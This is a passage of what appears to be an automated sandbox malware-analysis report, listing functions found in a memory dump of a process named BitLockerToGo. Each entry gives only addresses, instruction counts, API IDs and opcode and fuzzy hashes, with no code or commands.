                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateInstance
                  • String ID:
                  • API String ID: 542301482-0
                  • Opcode ID: c126ea52e41abcdf537dffc2eaa15039e53ec53821e06a353a35efc0c714d5e7
                  • Instruction ID: dbd3fe38cfaa4226a639a52b0c31508c1615ca7e11cfb9631c6ddf9fb51003ba
                  • Opcode Fuzzy Hash: c126ea52e41abcdf537dffc2eaa15039e53ec53821e06a353a35efc0c714d5e7
                  • Instruction Fuzzy Hash: F251DEB06043049BDB209B24CC82BB733A5EF85768F18451DF985CB391EB79EC81C76A
                  Function 0041D752 Relevance: 1.7, Strings: 1, Instructions: 454COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: RR\B
                  • API String ID: 0-2711932943
                  • Opcode ID: 1e20b469426e1a4ceba5f5a7e3675e1c810df3a59bdb86e527c7a8595ab23526
                  • Instruction ID: f14b18b4a79cfa9ca343ee7ec572cd7cd5e9d592d1cac471305a352fa90a8de8
                  • Opcode Fuzzy Hash: 1e20b469426e1a4ceba5f5a7e3675e1c810df3a59bdb86e527c7a8595ab23526
                  • Instruction Fuzzy Hash: 1FF1B1F0D04159CBDB10CF94D9817EEBBB5EF0A305F1410A9D945BB282D738AE85CBA9
                  Function 0040FE01 Relevance: 1.6, Strings: 1, Instructions: 393COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: f
                  • API String ID: 0-1993550816
                  • Opcode ID: b0f1fc926167446acaac4da3e99b80a85f7f2709cf7c01e79fdef47d98a00730
                  • Instruction ID: c58030209df7d731eea089703d19b28ea2457e08db768df7ec729ac128cd8fcc
                  • Opcode Fuzzy Hash: b0f1fc926167446acaac4da3e99b80a85f7f2709cf7c01e79fdef47d98a00730
                  • Instruction Fuzzy Hash: 21D1AF715083818FD325DF28D880B6BBBE5AF96304F14083EE5C597292D779E849CB9B
                  Function 00434450 Relevance: 1.6, Strings: 1, Instructions: 330COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: s
                  • API String ID: 0-3147937970
                  • Opcode ID: ecf57e573b5fc541f758763ba077c3d1620c0e41c3ef035a3e602e2bfb990515
                  • Instruction ID: 1339fb6671d6107eebceb272168648cff9d11f5deb80bdcc03f68ea5069bfc07
                  • Opcode Fuzzy Hash: ecf57e573b5fc541f758763ba077c3d1620c0e41c3ef035a3e602e2bfb990515
                  • Instruction Fuzzy Hash: A1B1CA35609250CFD308DF29D99026EF7E1EF8A314F09996EE9D687391C335E850CB8A
                  Function 00435280 Relevance: 1.4, Strings: 1, Instructions: 113COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID: InitializeThunk
                  • String ID: @
                  • API String ID: 2994545307-2766056989
                  • Opcode ID: f4a5180939e44455352e6b3c9d70b7816bbb708d60611c8bc677bd11ba4bf6a6
                  • Instruction ID: a5682bf830ca451fa58c070332c6148cd93f711f5e7dd3592c8e132e8ec5e5ae
                  • Opcode Fuzzy Hash: f4a5180939e44455352e6b3c9d70b7816bbb708d60611c8bc677bd11ba4bf6a6
                  • Instruction Fuzzy Hash: 5331A7B15083009BC304DF58C480A6BFBF4EF99344F14992EE9D887391D379E908CB9A
                  Function 004312A0 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 4`[b
                  • API String ID: 0-3962175265
                  • Opcode ID: ca2e2d3f9dbe7b1c02bf2886896d2adadbd9faa3efc377fcad9bcc2f6bad57e8
                  • Instruction ID: d6cfb4a75929a97e7e2e5279a909806e78228213a404230eb8b3ef2049e04bc8
                  • Opcode Fuzzy Hash: ca2e2d3f9dbe7b1c02bf2886896d2adadbd9faa3efc377fcad9bcc2f6bad57e8
                  • Instruction Fuzzy Hash: 6D11D370A0A2009BE710EF09C98072BB7A6EFD9745F24D96DD8C417325C736DC118B9A
                  Function 004089F0 Relevance: .8, Instructions: 790COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b5d5ba58d177b2efed7c437b31354b62a6068d43b79562ecba9ddb20f987222b
                  • Instruction ID: 1bb5ac5e92405edf3711af6a8adea0d532d113fbcb80973d60c4795d43a5a1c6
                  • Opcode Fuzzy Hash: b5d5ba58d177b2efed7c437b31354b62a6068d43b79562ecba9ddb20f987222b
                  • Instruction Fuzzy Hash: 4F42B2316087118BC724DF19E9406ABB3E2FFD4314F29893ED9D6A72C6DB389851CB46
                  Function 004043C0 Relevance: .7, Instructions: 699COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b4d444bd8182008c255fbd0f545ff52ec6aff01cb1ed3b5e8ec2b240f7129dc6
                  • Instruction ID: 1dad29aad54acd25d4310cb6e70577e6beb07201b1171edff6c09a3d3432341f
                  • Opcode Fuzzy Hash: b4d444bd8182008c255fbd0f545ff52ec6aff01cb1ed3b5e8ec2b240f7129dc6
                  • Instruction Fuzzy Hash: 3A52C4B15083459FCB14CF28C0806AABBE1BFC5314F198A7EE9D967391D378E945CB89
                  Function 00407EE0 Relevance: .7, Instructions: 670COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e788cf91381317cf902fa6ce946a8a22195d96aca10da25d0ea875a7f70ff504
                  • Instruction ID: dbee27f4f789a82ec2d0898c85c8301794d5349229091a5fc1401105c725cc22
                  • Opcode Fuzzy Hash: e788cf91381317cf902fa6ce946a8a22195d96aca10da25d0ea875a7f70ff504
                  • Instruction Fuzzy Hash: C652C370908B848FE7348B24C5847A7BBE1AB91314F14487FC5D616BC3DBBDA885CB5A
                  Function 00431710 Relevance: .6, Instructions: 642COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0b4d4f1c4a6c8b5be3b216847941817ca048b37479371689fa8a9f01bcdc37ab
                  • Instruction ID: 1d85a61e6ea3b05af87b81c98041c101f84ccf86b328ad8fa112422beab000f0
                  • Opcode Fuzzy Hash: 0b4d4f1c4a6c8b5be3b216847941817ca048b37479371689fa8a9f01bcdc37ab
                  • Instruction Fuzzy Hash: 8C22D37060D3419FC315DF18C890B2BBBE1AF99344F189A2EE5D5873A2D739E805CB5A
                  Function 00404DE0 Relevance: .6, Instructions: 592COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7d986370860ab6c0dfd3d7abd23b43ca2fc07bb1f8c1da0b09f5931cbbaca29a
                  • Instruction ID: d926c3b81f73b32e26fca523edfef230be4d91f5ac0649e8f7730882ffb4df7f
                  • Opcode Fuzzy Hash: 7d986370860ab6c0dfd3d7abd23b43ca2fc07bb1f8c1da0b09f5931cbbaca29a
                  • Instruction Fuzzy Hash: EF320270514B118FC328CE29C69066BB7F1FF85710BA04A2ED6A797F90D77AB845CB18
                  Function 0041FACE Relevance: .5, Instructions: 472COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0d2f0218e0183fe4e8943e2f8d8c7ddd4a110546912419a9d4a3483cf56d30c9
                  • Instruction ID: 372fac16e8b3b044b4cef8c4c98ef63bf704e103d82d74713b1a13331ae9af3e
                  • Opcode Fuzzy Hash: 0d2f0218e0183fe4e8943e2f8d8c7ddd4a110546912419a9d4a3483cf56d30c9
                  • Instruction Fuzzy Hash: 0CF16B701083018BD314DF18D8A1B6BB7F1FF96348F149A1EE5D64B3A1E3799886CB5A
                  Function 004096A0 Relevance: .4, Instructions: 416COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ae11c406648a7fc180907c68c030f4ed208de1cb93c2465aee1efe5d11bb31ba
                  • Instruction ID: 0a89089fcc7c80f52da5ee838649d9c67dada8c506e9a8c0c6c112cef45c9d07
                  • Opcode Fuzzy Hash: ae11c406648a7fc180907c68c030f4ed208de1cb93c2465aee1efe5d11bb31ba
                  • Instruction Fuzzy Hash: 28F18472A0C3519BC719CF18D56012BFBE1AF85720F15C95EF8DA67392D2389C058F86
                  Function 00406ED0 Relevance: .4, Instructions: 399COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 61d1cf4299b4eff69189087bfea1d47d681d875c67e5878a0836d40b0c0adaf8
                  • Instruction ID: 300e058ca7008f0f2ab9a1c84f0cfc945f98d4e60c04c44ab2c6ebd24a3c2323
                  • Opcode Fuzzy Hash: 61d1cf4299b4eff69189087bfea1d47d681d875c67e5878a0836d40b0c0adaf8
                  • Instruction Fuzzy Hash: 1DE19D7160C3418FD720DF29C880A2BBBE1EF99300F44882DF9D597792E279E945CB96
                  Function 0041D290 Relevance: .4, Instructions: 376COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 77197c083aaba09acb7c97d596386f64e84da716a19577bff98c620949bb0846
                  • Instruction ID: d469a9fd099916641e7af45228ff83882ab6a3a046fbd980055a7f3d91aaf0f1
                  • Opcode Fuzzy Hash: 77197c083aaba09acb7c97d596386f64e84da716a19577bff98c620949bb0846
                  • Instruction Fuzzy Hash: 3EB1E2B0A083019BD714DF18D88076BB7E2EF95344F14492EE5D587392E339EC95CB9A
                  Function 0040F7AA Relevance: .3, Instructions: 310COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5b91d4c44556cc8df3f8bea8e089a9c93b73b58ccbbfb36ed220198aa31c1113
                  • Instruction ID: 35214082d0261bd7c2f494b78c8d1fb33de92fba197aad1ad32d32c0602666cd
                  • Opcode Fuzzy Hash: 5b91d4c44556cc8df3f8bea8e089a9c93b73b58ccbbfb36ed220198aa31c1113
                  • Instruction Fuzzy Hash: FDC105B15083808BD325EF18C490B9FBBF5AF96304F140D2DE5C5972A1E3799855CB5B
                  Function 00407A30 Relevance: .3, Instructions: 306COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 62ca652540d8db80aba5fb45d79b5ff0e85d2d0de297b52b935d04befa145f5e
                  • Instruction ID: fcd92f85f722d29771711bea71318d053ea312c67c8e3b98394ff2554a876c84
                  • Opcode Fuzzy Hash: 62ca652540d8db80aba5fb45d79b5ff0e85d2d0de297b52b935d04befa145f5e
                  • Instruction Fuzzy Hash: E3C169B29087418FC370CF28C856BABB7E1BF85318F08492ED5D9D7242E778A555CB46
                  Function 00435990 Relevance: .3, Instructions: 304COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7edb6f218e886a6e01bc6bb65624657daa914bb7fd8497a808306dccb7375cda
                  • Instruction ID: 91351a6411eede8510a48e9d3e0c97131074af14a498c156a089917c32c58353
                  • Opcode Fuzzy Hash: 7edb6f218e886a6e01bc6bb65624657daa914bb7fd8497a808306dccb7375cda
                  • Instruction Fuzzy Hash: 2791CC746087029BC714EF18D890A2BB3F1FF89744F14A92DE8958B351E735EC51CB9A
                  Function 0041F011 Relevance: .3, Instructions: 284COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: aff9c01c7092060b18eebd3cc62698c9a4933d138d1c9060609220d9f63eb501
                  • Instruction ID: fb4eb7b29ce90f0fcef1ffaaaf4482de166cb3ec6aa59cf67ea79cdd651bf6d2
                  • Opcode Fuzzy Hash: aff9c01c7092060b18eebd3cc62698c9a4933d138d1c9060609220d9f63eb501
                  • Instruction Fuzzy Hash: B3912C32908395CFD3208F38984139ABBE2FF8A310F19867DEAD4572A2D7759D49CB45
                  Function 004353C0 Relevance: .3, Instructions: 283COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 4633380cb5aa9a01bdf42f3ee74d6af1fbad1056e992296935ac1758a20b516d
                  • Instruction ID: d97e13e79fb54aed1778e4fde40f2130a8468fb4d013a40ce951b6bc77f4db98
                  • Opcode Fuzzy Hash: 4633380cb5aa9a01bdf42f3ee74d6af1fbad1056e992296935ac1758a20b516d
                  • Instruction Fuzzy Hash: 7181DF346083429FC310DF18C880A2BB7E2EF99755F58982EE4C987361D735EC51CB9A
                  Function 004356B0 Relevance: .3, Instructions: 278COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a95b333b5fdaa6ee9f999d9a8d966dfa84f83efb0328c793aefb6942ceee3045
                  • Instruction ID: 9fe38513821a24b6b311f778e7176b17307aefb38c32e3ed557eac2ef6762773
                  • Opcode Fuzzy Hash: a95b333b5fdaa6ee9f999d9a8d966dfa84f83efb0328c793aefb6942ceee3045
                  • Instruction Fuzzy Hash: BC81F074A09712CBD718EF08D480A2BB7B2EF9C710F19992DE98547351E735EC10CB9A
                  Function 00431E80 Relevance: .3, Instructions: 277COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d665c50894058b7be49d7ad41d811bec6247424ecc8f2325b01fee071bbd6d65
                  • Instruction ID: 262c1947903438a8028ad7c6927f73c7030088c0692acf88f520c2847163f278
                  • Opcode Fuzzy Hash: d665c50894058b7be49d7ad41d811bec6247424ecc8f2325b01fee071bbd6d65
                  • Instruction Fuzzy Hash: F891477020C3824FC315CF28C5D052AFBE2AF9A204F1886BEE5E54B353D639D805CB96
                  Function 00420980 Relevance: .2, Instructions: 207COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c674e0c62231f339c99bb2794b7516979f28c7009b980525353c599bf5cd72a3
                  • Instruction ID: e19b87bc132a8fd02b36220eae86b80571f8f99a322e30f4a1b6eeafebd849d0
                  • Opcode Fuzzy Hash: c674e0c62231f339c99bb2794b7516979f28c7009b980525353c599bf5cd72a3
                  • Instruction Fuzzy Hash: 6461FA317083214BD7349E7DA88031BB7D26B95334F99872EE4B58B3E7D6749C418749
                  Function 0042C890 Relevance: .2, Instructions: 189COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6885a0fcfb0c9b86ad9a13744526bb8ccce4ab1cd58e6af8626791e033d60b52
                  • Instruction ID: c34af04494c5c0d4b77374b85862130c5c4e1949dae62310d609942568345947
                  • Opcode Fuzzy Hash: 6885a0fcfb0c9b86ad9a13744526bb8ccce4ab1cd58e6af8626791e033d60b52
                  • Instruction Fuzzy Hash: 1C517DB16087548FE314DF69D49435FBBE1BBC8358F444A2EE4E987350E379DA088B86
                  Function 0041EDFE Relevance: .2, Instructions: 173COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 527c3668166566409b45c37ef3e55825d1d0728ddb109cf1d2457d4d0fcca718
                  • Instruction ID: aad32dcb9c3a8a820e8a9b0374286b62020eb445d873f12179b3becfe7bedaf9
                  • Opcode Fuzzy Hash: 527c3668166566409b45c37ef3e55825d1d0728ddb109cf1d2457d4d0fcca718
                  • Instruction Fuzzy Hash: 0351C3756083468BC718CF29C85066BB7E2BBC9314F18462DED99C73D1E738E941CB95
                  Function 0040FDEB Relevance: .2, Instructions: 151COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8c82857782c1a0f4b7849e84b8a33eb67cb3664aaba2aa5fc7f0a5f83cfdae9e
                  • Instruction ID: 8fca4fa2c7a79be25c5ab868bfb8e5efea84f255277748ef6d2c9f30f6573229
                  • Opcode Fuzzy Hash: 8c82857782c1a0f4b7849e84b8a33eb67cb3664aaba2aa5fc7f0a5f83cfdae9e
                  • Instruction Fuzzy Hash: 5F5104B010C3808BD315EB18D494B5EFBF5EF96744F14082EE6C5972A2D33A9895CB2B
                  Function 00412FA0 Relevance: .1, Instructions: 142COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: dbbe1064c69938d65b486df3f59400410b0dc9d71aab55889668f724093733ba
                  • Instruction ID: 8891c8d2870752da82ebbb0641bd333731553f3b48b7a9585822537ca2232749
                  • Opcode Fuzzy Hash: dbbe1064c69938d65b486df3f59400410b0dc9d71aab55889668f724093733ba
                  • Instruction Fuzzy Hash: 25413E725083049BC310DF28C8C07AFBBE4EF5A324F15462AE899873D1E77ADA84C756
                  Function 0040CF60 Relevance: .1, Instructions: 126COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d4548d3ad510b1638899252ad9799f82c9f02534f1175fcb33bd1df4ea4193d1
                  • Instruction ID: db6b4534b311c360e402e25fd942681088852c47a0ea67b92779693da48600f1
                  • Opcode Fuzzy Hash: d4548d3ad510b1638899252ad9799f82c9f02534f1175fcb33bd1df4ea4193d1
                  • Instruction Fuzzy Hash: DC41036272C3A14FC3188A7D88D022ABAD29B85224F19877EF0E6C77D1E678C546A715
                  Function 0042D070 Relevance: .1, Instructions: 110COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0219c1794d05dfc259d2be2a2b6352718cd38d8fee708d7bfc27eaba79a4984e
                  • Instruction ID: d1c1eafd728b63fff57dfac31ac36773224f00f10da96fb63f99c76618ea0c88
                  • Opcode Fuzzy Hash: 0219c1794d05dfc259d2be2a2b6352718cd38d8fee708d7bfc27eaba79a4984e
                  • Instruction Fuzzy Hash: 6C212331B4C2244BC320AE18D84156BF3E1DBD5714F598A3ED4C883B50E27DE856C6C6
                  Function 00403290 Relevance: .1, Instructions: 95COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7d8c35eb948fee5ec14c360b0d226d1626b883ee1d8d8d56010a58535980c663
                  • Instruction ID: c0981a52b7d0cb8d5434104da1c971853150875eb1de47fa77b41cb741ecef7f
                  • Opcode Fuzzy Hash: 7d8c35eb948fee5ec14c360b0d226d1626b883ee1d8d8d56010a58535980c663
                  • Instruction Fuzzy Hash: EE31B8316042009FD7149E59C88192BBBE5EFC4316F18897EE89AA73C1D739DE52CB4A
                  Function 00404000 Relevance: .1, Instructions: 76COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8d8e5c53f138e107681432e6547af20e14252c468ecd117c758df3258f8e02a2
                  • Instruction ID: de790ff34d6914aa2eafd1c16abe52be8c973ad01a7e734368bdcf606e5cddb4
                  • Opcode Fuzzy Hash: 8d8e5c53f138e107681432e6547af20e14252c468ecd117c758df3258f8e02a2
                  • Instruction Fuzzy Hash: 44112777B2A22257E350DE76ECD46176352EBCA31070A0535EF41F3382CA37E801D194
                  Function 00429540 Relevance: .1, Instructions: 64COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                  • Instruction ID: 76eb2d5c218abb0ece6d21c720d5e3d0066247a52ff6111daafc1c28480bd4e5
                  • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                  • Instruction Fuzzy Hash: 9111C633B051E50EC3178D3C9400565BFE31EA3234F99479AE4B89B2D2D6268DCA8359
                  Function 004208E0 Relevance: .1, Instructions: 63COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b1a4327b616145a8256732a63ef06c0a142c369d0753aa5bca23629272cb00c9
                  • Instruction ID: 397dbd20b44f47fd2719dafe133febb14eefe144a2677e07e0f8d42000f8b59b
                  • Opcode Fuzzy Hash: b1a4327b616145a8256732a63ef06c0a142c369d0753aa5bca23629272cb00c9
                  • Instruction Fuzzy Hash: 1B015EF570031247E720AE55E4C172BA2E86B95748F58443EE80967383DBB9EC45CAA9
                  Function 00412F50 Relevance: .0, Instructions: 38COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
